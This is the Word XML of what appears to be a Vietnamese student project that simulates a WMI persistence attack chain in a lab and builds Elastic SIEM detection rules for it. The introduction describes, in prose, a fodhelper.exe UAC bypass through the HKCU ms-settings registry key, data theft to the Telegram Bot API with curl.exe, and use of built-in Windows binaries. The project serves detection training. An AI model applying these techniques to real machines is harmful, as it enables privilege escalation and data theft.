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3F5A3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC354F2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRPr="00CA36D2" w:rsidRDefault="00B01B4A" w:rsidP="00CA36D2"/>
    <w:p w14:paraId="539E7C83" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021B9B10" w14:textId="36505C74" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>MÔ PHỎNG TẤN CÔNG &amp; XÂY DỰNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781876BF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>QUY TẮC PHÁT HIỆN TRÊN SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D907798" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1A047A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7378B5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pP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01B4A" w14:paraId="3D08795D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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1EEA7B91" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Chuyên ngành</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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4932BEA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An toàn thông tin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="274F883B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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0924B7F6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lĩnh vực</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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0B1FD4E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blue Team / Detection Engineering / SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5590AC75" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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312A12AE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nền tảng SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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61B6F7C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elastic Stack 9.x — Elasticsearch + Kibana + Fleet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5C51C30B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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2A34D820" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Môi trường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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8541260" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows 10 VM (DESKTOP-GDP9KH5) — Sysmon v15.15 — Elastic Agent 9.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="423EBB3D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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47B4527D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kỹ thuật ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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BCD68EA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1566.002, T1204.002, T1059.005, T1548.002, T1546.003, T1082, T1016, T1005, T1560.001, T1041, T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="11A4C298" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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7BA1F217" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detection Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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ED161E2" w14:textId="1B47221F" w:rsidR="00B01B4A" w:rsidRDefault="001E275F">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5 Correlation Rules (C1–C5) + 4 Signal Rules (S1–S4) — EQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1412C420" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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78C9EA20" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tỷ lệ phát hiện</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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527D491" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>100% — Tất cả 7 phase đều có alert tương ứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="14421615" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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2EFAC66F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Năm học</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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59B5CC0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025 – 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4655DF6C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67690A20" w14:textId="7786B875" w:rsidR="00B01B4A" w:rsidRDefault="00000000" w:rsidP="00CA36D2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4819"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I. MỤC LỤC</w:t>
      </w:r>
      <w:r w:rsidR="00CA36D2">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B649F0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I.  </w:t>
      </w:r>
      <w:r>
        <w:t>Mục lục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F4DA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">II.  </w:t>
      </w:r>
      <w:r>
        <w:t>Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E922AB2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">III.  </w:t>
      </w:r>
      <w:r>
        <w:t>Triển khai môi trường lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CEF9D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IV.  </w:t>
      </w:r>
      <w:r>
        <w:t>Cài đặt và cấu hình Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C014B19" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">V.  </w:t>
      </w:r>
      <w:r>
        <w:t>Pipeline log — Luồng dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB0209" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VI.  </w:t>
      </w:r>
      <w:r>
        <w:t>Kịch bản tấn công WMI APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379C1CD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VII.  </w:t>
      </w:r>
      <w:r>
        <w:t>Phân tích từng phase tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CA799" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.  </w:t>
      </w:r>
      <w:r>
        <w:t>Bảng mapping MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D864F0E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IX.  </w:t>
      </w:r>
      <w:r>
        <w:t>Detection rules theo từng phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EE346" w14:textId="12F4CE50" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I.  </w:t>
      </w:r>
      <w:r>
        <w:t>Kiểm thử từng phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81F802" w14:textId="549B9EBD" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XI.  </w:t>
      </w:r>
      <w:r>
        <w:t>Kiểm thử toàn bộ kill chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1416B4" w14:textId="7125A408" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XII.  </w:t>
      </w:r>
      <w:r>
        <w:t>Kiến trúc hệ thống detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7D725" w14:textId="299E678D" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XI</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5ABE3" w14:textId="3CF7458B" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="001E275F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">V.  </w:t>
      </w:r>
      <w:r>
        <w:t>Phụ lục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306010A3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316DFAB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>III. TRIỂN KHAI MÔI TRƯỜNG LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C44092" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>II. GIỚI THIỆU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDCE5E" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Tổng Quan về WMI Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012E83B" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation (WMI) là một hạ tầng quản lý tích hợp sẵn trong mọi phiên bản Windows hiện đại, cung cấp giao diện lập trình thống nhất để truy vấn và kiểm soát tài nguyên hệ thống. WMI Event Subscription — cụ thể là kỹ thuật T1546.003 theo MITRE ATT&amp;CK — cho phép kẻ tấn công đăng ký các sự kiện hệ thống và kích hoạt payload tự động mà không cần file thực thi trên disk, không cần registry Run key, và không để lại bất kỳ artifact nào mà antivirus truyền thống có thể phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3063F17B" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Cơ chế hoạt động gồm ba thành phần: __EventFilter định nghĩa điều kiện kích hoạt (ví dụ: khi notepad.exe được mở), CommandLineEventConsumer xác định lệnh cần thực thi, và __FilterToConsumerBinding liên kết hai thành phần trên. Toàn bộ subscription tồn tại trong WMI repository của Windows, chạy dưới quyền NT AUTHORITY\SYSTEM, và duy trì qua reboot — đặc điểm khiến WMI persistence trở thành một trong những kỹ thuật nguy hiểm nhất trên nền tảng Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533D18E" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 UAC Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAEE35" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>User Account Control (UAC) là cơ chế bảo mật của Windows ngăn chặn các thao tác yêu cầu quyền administrator mà không có sự xác nhận rõ ràng từ người dùng. Kỹ thuật T1548.002 — Bypass User Account Control qua fodhelper.exe — khai thác thuộc tính autoElevate=true trong manifest của binary Microsoft-signed này. Khi fodhelper.exe được gọi, Windows tự động nâng quyền mà không hiển thị UAC dialog, cho phép kẻ tấn công leo thang từ user context lên administrator mà không cần tương tác người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489134E1" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Trong kịch bản đồ án, UAC bypass được thực hiện bằng cách ghi đè registry key HKCU\Software\Classes\ms-settings\Shell\Open\command trỏ đến VBScript proxy, sau đó trigger fodhelper.exe. Sau khi fodhelper spawn process con với quyền elevated, registry key lập tức được xóa — để lại window phát hiện cực ngắn khoảng 3 giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A67C79" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Exfiltration qua Telegram Bot API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F01F48A" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Telegram Bot API cung cấp giao diện HTTPS chuẩn để gửi tin nhắn và file qua kênh được mã hóa end-to-end. Từ góc độ network security, traffic đến api.telegram.org:443 hoàn toàn hợp lệ và thường bị bỏ qua bởi các firewall doanh nghiệp. Kẻ tấn công lợi dụng đặc điểm này để exfiltrate dữ liệu qua kênh HTTPS encrypted mà không cần domain riêng, không cần C2 infrastructure, và không thể bị chặn mà không ảnh hưởng đến Telegram hợp lệ trong tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F3004" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Payload trong đồ án sử dụng curl.exe — binary có sẵn trên Windows 10 — để upload file ZIP và Invoke-RestMethod để gửi thông báo embed, kết hợp hai phương thức exfil trong một script nhất quán.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1FA26" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Living-off-the-Land (LOLBins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D63E78" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Living-off-the-Land (LOLBins) là triết lý tấn công sử dụng các công cụ và binary có sẵn trong hệ điều hành thay vì tải lên malware riêng. Toàn bộ attack chain trong đồ án chỉ sử dụng: mshta.exe (decoy HTA), wscript.exe (VBS proxy), powershell.exe, fodhelper.exe, reg.exe (registry manipulation), curl.exe (file upload), arp.exe và ipconfig.exe (network discovery). Không có file thực thi bên thứ ba nào được tải xuống hay thực thi, khiến signature-based detection hoàn toàn mù trước chuỗi tấn công này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A278A69" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Detection Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5D20F" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Detection Engineering là quá trình thiết kế và xây dựng các quy tắc phát hiện dựa trên phân tích hành vi thay vì đặc điểm tĩnh của malware. Trong đồ án, toàn bộ detection rules được xây dựng theo nguyên tắc behavioral invariants — những đặc tính kỹ thuật mà kẻ tấn công không thể thay đổi nếu vẫn dùng cùng technique theo mô tả của MITRE ATT&amp;CK. Ví dụ: WmiPrvSE.exe là parent process bất biến khi WMI Consumer kích hoạt — đây là architectural constraint của Windows, không phải artifact tùy chọn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26886337" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EQL (Event Query Language) của Elastic cho phép viết correlation rules với sequence logic và timing constraints, biến việc phát hiện một chuỗi hành vi có liên quan thành một alert duy nhất có ngữ nghĩa rõ ràng, thay vì hàng chục alerts đơn lẻ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5952FFAF" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.6 Mục Tiêu Đồ Án</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027BA15" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đồ án hướng đến các mục tiêu cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AABD7" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Xây dựng môi trường lab thực tế với Windows 10 endpoint và Elastic Stack 9.x trên Kibana Cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F4CBE" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Triển khai Sysmon với cấu hình phù hợp để thu thập đầy đủ telemetry cho 7 phases của attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FF5C2" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mô phỏng kịch bản APT hoàn chỉnh sử dụng hoàn toàn LOLBins — không có malware bên thứ ba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233DA22" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Xây dựng và kiểm thử 9 detection rules (5 Correlation, 4 Signal) bằng EQL trên Elastic SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A442F35" w14:textId="77777777" w:rsidR="008E20F7" w:rsidRDefault="008E20F7" w:rsidP="008E20F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
